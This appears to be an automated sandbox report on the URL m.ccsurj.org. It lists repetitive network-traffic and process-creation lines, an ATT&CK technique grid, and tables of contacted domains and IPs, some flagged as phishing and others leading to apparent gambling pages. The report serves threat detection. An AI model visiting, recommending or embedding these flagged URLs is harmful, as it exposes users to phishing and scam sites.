Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: classification engineClassification label: mal56.win@19/335@44/13
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1976,i,7273462861023531778,15793530550184385695,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://m.ccsurj.org/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1976,i,7273462861023531778,15793530550184385695,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://m.ccsurj.org/"Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://m.ccsurj.org/100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://p3yw7u.innittapp.com/061410/rcenter/common/js/jquery/plugins/jquery.poshytip/jquery.poshytip.js?v=17361508514370%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/commonPage/zh_CN/pubads/images/ads2.png0%Avira URL Cloudsafe
https://www.ccsurj.org/__local/7/57/19/8893B54885AD47B81497E346099_E950D003_146A63.png100%Avira URL Cloudphishing
https://www.ccsurj.org/sitegray/sitegray.js100%Avira URL Cloudphishing
https://www.4a0kzf.com/Yvj30%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/common/ClassTool.js?v=17361508514370%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/base.css0%Avira URL Cloudsafe
https://551000l.cc/message_zh_CN.js?v=17361508514370%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/commonPage/themes/hongbao.css0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/061410/rcenter/common/js/bootstrap/bootstrap.js?v=17361508514370%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/commonPage/images/default-banner.jpg0%Avira URL Cloudsafe
https://appiso-ali.ghgdfdf.com/?cGkxMl90NDA3MQ==&c=101105706293#/0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/commonPage/themes/gui-skin-default.css0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/061410/rcenter/common/themes/default/jquery/plugins/jquery.poshytip/poshytip.css0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/bet365-1761/images/index/game_1.png0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/bet365-1761/images/index/collabor_6.png0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/common/jquery.validate.extend.msites.j0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/common/urlencode.js0%Avira URL Cloudsafe
https://xj206.cc/0%Avira URL Cloudsafe
https://www.ccsurj.org/images/ico_tz.png100%Avira URL Cloudphishing
https://1k4ej4j1lxvjwz.com/popper.min.js0%Avira URL Cloudsafe
https://1k4ej4j1lxvjwz.com/imgs/sansanqiqi.png0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/commonPage/js/float.js0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/common/main.js0%Avira URL Cloudsafe
https://www.ccsurj.org/images/tt_bg.png100%Avira URL Cloudphishing
https://www.ccsurj.org/system/resource/js/calendar/simple.js100%Avira URL Cloudphishing
https://www.ccsurj.org/style/style.css100%Avira URL Cloudphishing
https://p3yw7u.innittapp.com/ftl/commonPage/js/websocket/Comet.js0%Avira URL Cloudsafe
https://789400.cc/0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/default/login.css0%Avira URL Cloudsafe
https://1k4ej4j1lxvjwz.com/imgs/188jinbaobo.png0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/061410/rcenter/common/js/curl/curl/loader/legacy.js?v=17361508514370%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/commonPage/js/idangerous.swiper.min.js0%Avira URL Cloudsafe
https://1k4ej4j1lxvjwz.com/quicklink.umd.js0%Avira URL Cloudsafe
http://12aff.best5689.com/92043302/signup/cs/index.html0%Avira URL Cloudsafe
https://www.ccsurj.org/images/slider-arrow.png100%Avira URL Cloudphishing
https://www.ccsurj.org/images/logo-xxgcxy.jpg100%Avira URL Cloudphishing
https://p3yw7u.innittapp.com/ftl/bet365-1761/images/index/game_5.png0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/bet365-1761/images/index/services_title_bg.png0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/fserver/files/gb/1761/carousel/10048/1719344459903.jpg)0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/bet365-1761/images/index/icon_game_5.png0%Avira URL Cloudsafe
https://vkg.hpdbfezgrqwn.vip/wdzmr.php0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/bet365-1761/images/header/header_bg.jpg0%Avira URL Cloudsafe
https://www.ccsurj.org/@public/js.js100%Avira URL Cloudphishing
https://p3yw7u.innittapp.com/ftl/commonPage/js/jquery/jquery.super-marquee.js0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/fserver0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/061410/rcenter/common/static/js/gb.validation.min.js?v=17361508514370%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/bet365-1761/images/index/collabor_2.png0%Avira URL Cloudsafe
https://www.ccsurj.org/__local/F/3A/FA/D3291F0B28550FCE05C6FD5AA87_291DC08D_1634EF4.png100%Avira URL Cloudphishing
https://1k4ej4j1lxvjwz.com/css/modalStyles.css0%Avira URL Cloudsafe
https://1k4ej4j1lxvjwz.com/imgs/kaiyun.png0%Avira URL Cloudsafe
https://service.sdqhwtvbtwdf.com/C.ashx?btag=a_18017b_2484c_&affid=2017190&siteid=18017&adid=2484&c=0%Avira URL Cloudsafe
https://www.ss52611.com/vip.html?c=880036985400%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/bet365-1761/themes/style/common.css0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/061410/rcenter/common/js/jquery/plugins/jquery.validate/jquery.validate.js0%Avira URL Cloudsafe
https://m399227.com0%Avira URL Cloudsafe
http://kaiyunty583.net0%Avira URL Cloudsafe
https://www.ccsurj.org/images/21/11/25/1p6vg4xelj/banner-1.jpg100%Avira URL Cloudphishing
http://james.padolsey.com)0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/bet365-1761/images/icon_marquee.png0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/fserver/files/gb/1761/carousel/10050/1719344563012.jpg)0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/bet365-1761/images/index/collabor_5.png0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/components/selectPure.js?v=17361508514370%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/commonPage/js/websocket/CometMarathon.js0%Avira URL Cloudsafe
https://wy-ali.meriksenrusso.com/wx/app/proxy-qrcode.html?url=aHR0cHM6Ly9hcHBpc28tdHkuenZiempzYi5jb20%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/bet365-1761/images/index/hot_game_title.png0%Avira URL Cloudsafe
https://1k4ej4j1lxvjwz.com/imgs/2025shiyunhui.png0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/commonPage/js/layer.js0%Avira URL Cloudsafe
https://lucky298.com/vsglat0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/061410/rcenter/common/themes/base.css0%Avira URL Cloudsafe
https://1k4ej4j1lxvjwz.com/imgs/2025fajia.png0%Avira URL Cloudsafe
https://1k4ej4j1lxvjwz.com/imgs/tychongse.png0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/bet365-1761/images/index/game_fish_42_5.png0%Avira URL Cloudsafe
https://www.ccsurj.org/js/jquery.js100%Avira URL Cloudphishing
https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/default/common.css?v=17361508514370%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/home/TopPage.js?v=17361508514370%Avira URL Cloudsafe
https://www.ljjapp2.com/?6011580%Avira URL Cloudsafe
https://e977110.com/wap/downloadApp?promoCode=pK8XQc0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/fserver/files/gb/1761/carousel/10008/1719344412734.jpg)0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/061410/rcenter/common/images/errors/blue-bg.jpg0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/bet365-1761/images/index/download_bg.png0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/commonPage/themes/gui-layer.css0%Avira URL Cloudsafe
https://j21716.com0%Avira URL Cloudsafe
https://11073377.app0%Avira URL Cloudsafe
https://www.ccsurj.org/images/21/11/25/1p6vg4xelj/banner-5.jpg100%Avira URL Cloudphishing
https://p3yw7u.innittapp.com/061410/rcenter/common/themes/default/font-awesome/font-awesome.css0%Avira URL Cloudsafe
https://www.ccsurj.org/system/resource/js/vsbscreen.min.js100%Avira URL Cloudphishing
https://a43389.cc/0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/commonPage/themes/gui-base.css0%Avira URL Cloudsafe
https://wros8.top/vjS20%Avira URL Cloudsafe
https://www.ccsurj.org/images/21/11/25/1p6vg4xelj/banner-4.jpg100%Avira URL Cloudphishing
https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/default/style.css0%Avira URL Cloudsafe
https://1k4ej4j1lxvjwz.com/imgs/gf.fc8d6758.png0%Avira URL Cloudsafe
https://p3yw7u.innittapp.com/ftl/bet365-1761/images/index/collabor_1.png0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
1k4ej4j1lxvjwz.com
122.10.50.210
truefalse
    high
    551000l.cc
    154.193.113.233
    truefalse
      high
      l5-global.gslb.ksyuncdn.com
      103.198.200.7
      truefalse
        high
        www.wshifen.com
        103.235.46.96
        truefalse
          high
          d3h3opd4qa0dfk.cloudfront.net
          13.32.121.43
          truefalse
            unknown
            www.ccsurj.org
            154.216.143.26
            truefalse
              unknown
              www.google.com
              142.250.185.100
              truefalse
                high
                vkg.hpdbfezgrqwn.vip
                122.10.26.202
                truefalse
                  high
                  ucloud-internal.v.ucnaming.com
                  36.27.222.245
                  truefalse
                    unknown
                    www.sogou.com
                    43.153.236.147
                    truefalse
                      high
                      m.ccsurj.org
                      154.216.143.26
                      truefalse
                        unknown
                        p.ssl.qhimg.com
                        unknown
                        unknownfalse
                          high
                          p3yw7u.innittapp.com
                          unknown
                          unknownfalse
                            unknown
                            www.baidu.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://p3yw7u.innittapp.com/061410/rcenter/common/js/jquery/plugins/jquery.poshytip/jquery.poshytip.js?v=1736150851437false
                              • Avira URL Cloud: safe
                              unknown
                              https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/common/ClassTool.js?v=1736150851437false
                              • Avira URL Cloud: safe
                              unknown
                              https://www.ccsurj.org/sitegray/sitegray.jstrue
                              • Avira URL Cloud: phishing
                              unknown
                              https://www.ccsurj.org/__local/7/57/19/8893B54885AD47B81497E346099_E950D003_146A63.pngtrue
                              • Avira URL Cloud: phishing
                              unknown
                              https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/base.cssfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://p3yw7u.innittapp.com/061410/rcenter/common/js/bootstrap/bootstrap.js?v=1736150851437false
                              • Avira URL Cloud: safe
                              unknown
                              https://p3yw7u.innittapp.com/ftl/commonPage/themes/hongbao.cssfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://551000l.cc/message_zh_CN.js?v=1736150851437false
                              • Avira URL Cloud: safe
                              unknown
                              https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/common/urlencode.jsfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://p3yw7u.innittapp.com/061410/rcenter/common/themes/default/jquery/plugins/jquery.poshytip/poshytip.cssfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://www.sogou.com/web/index/images/logo_440x140.v.4.pngfalse
                                high
                                https://p3yw7u.innittapp.com/ftl/commonPage/themes/gui-skin-default.cssfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.ccsurj.org/images/ico_tz.pngfalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/common/main.jsfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.ccsurj.org/style/style.cssfalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://p3yw7u.innittapp.com/ftl/commonPage/js/websocket/Comet.jsfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://1k4ej4j1lxvjwz.com/imgs/sansanqiqi.pngfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.ccsurj.org/images/tt_bg.pngfalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://1k4ej4j1lxvjwz.com/popper.min.jsfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.ccsurj.org/system/resource/js/calendar/simple.jsfalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://p3yw7u.innittapp.com/ftl/commonPage/js/float.jsfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/default/login.cssfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://1k4ej4j1lxvjwz.com/imgs/188jinbaobo.pngfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://1k4ej4j1lxvjwz.com/quicklink.umd.jsfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://p3yw7u.innittapp.com/061410/rcenter/common/js/curl/curl/loader/legacy.js?v=1736150851437false
                                • Avira URL Cloud: safe
                                unknown
                                https://p3yw7u.innittapp.com/ftl/commonPage/js/idangerous.swiper.min.jsfalse
